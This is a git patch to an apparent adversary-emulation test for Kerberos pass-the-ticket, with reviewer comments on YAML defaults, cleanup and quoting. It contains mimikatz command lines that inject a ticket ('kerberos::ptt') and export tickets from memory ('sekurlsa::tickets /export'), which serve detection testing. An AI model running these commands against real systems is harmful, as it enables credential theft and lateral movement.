From 5b360eb7440dd799acbd883c370f81852172cb6f Mon Sep 17 00:00:00 2001
From: hackeT <40039738+Tatsuya-hasegawa@users.noreply.github.com>
Date: Thu, 9 Dec 2021 01:56:45 +0900
Subject: [PATCH] T1550.003 pass the ticket by mimikatz patch (#1682)
* Update T1550.003.md To avoid mimikatz failure and more useful argument description
* Update T1550.003.yaml To avoid to fail mimikatz kerberos::ptt and be more easier to understand about argument.
* Update T1550.003.yaml
* Update T1550.003.md
* Update T1550.003.md
* Update T1550.003.yaml
---
 atomics/T1550.003/T1550.003.md | 5 ++---
 atomics/T1550.003/T1550.003.yaml | 12 ++++--------
 2 files changed, 6 insertions(+), 11 deletions(-)
diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md
index d39b6ddf..58f8698b 100644
--- a/atomics/T1550.003/T1550.003.md
+++ b/atomics/T1550.003/T1550.003.md
@@ -32,8 +32,7 @@ Similar to PTH, but attacking Kerberos
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| user_name | username | String | Administrator|
-| domain | domain | String | atomic.local|
+| ticket | Ticket file name usually format of 'id-username\@domain\.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) | String | |
 | mimikatz_exe | Path of the Mimikatz binary | Path | PathToAtomicsFolder\T1550.003\bin\mimikatz.exe|
@@ -41,7 +40,7 @@ Similar to PTH, but attacking Kerberos
 ```cmd
-#{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain}
+#{mimikatz_exe} "kerberos::ptt #{ticket}"
 ```
diff --git a/atomics/T1550.003/T1550.003.yaml b/atomics/T1550.003/T1550.003.yaml
index 518b5a09..147cdd63 100644
--- a/atomics/T1550.003/T1550.003.yaml
+++ b/atomics/T1550.003/T1550.003.yaml
@@ -8,14 +8,10 @@ atomic_tests:
 supported_platforms:
 - windows
 input_arguments:
- user_name:
- description: username
+ ticket:
+ description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module)
 type: String
- default: Administrator
- domain:
- description: domain
- type: String
- default: atomic.local
+ default:
 mimikatz_exe:
 description: Path of the Mimikatz binary
 type: Path
@@ -35,5 +31,5 @@ atomic_tests:
 Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
 executor:
 command: |
- #{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain}
+ #{mimikatz_exe} "kerberos::ptt #{ticket}"
 name: command_prompt
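Review bot: The new `ticket` argument is declared with a bare `default:`, which YAML loads as null rather than an empty string, so a run that does not supply a ticket presumably reaches the executor with an empty or null substitution instead of failing early. I would write `default: ''` to make the empty value explicit. A prerequisite check that the ticket file exists would also help, so the test reports a missing input rather than a mimikatz error; the dependencies section is only partly visible in this patch, so such a check may already exist. The `\@` in the description looks like a Markdown escape carried into the YAML; unless the doc generator needs it, `'id-username@domain.kirbi'` reads cleaner.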
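Review bot: Nothing visible in this hunk removes the injected ticket after the test, so the ticket loaded by `kerberos::ptt` stays in the logon session's cache on the test host. The executor block may continue past the hunk; if it has no cleanup there, I would add `cleanup_command: klist purge` next to `command`. Because `#{ticket}` is substituted inside the double-quoted argument, a file name containing a space or a double quote may also break the command line, which is worth stating in the argument description.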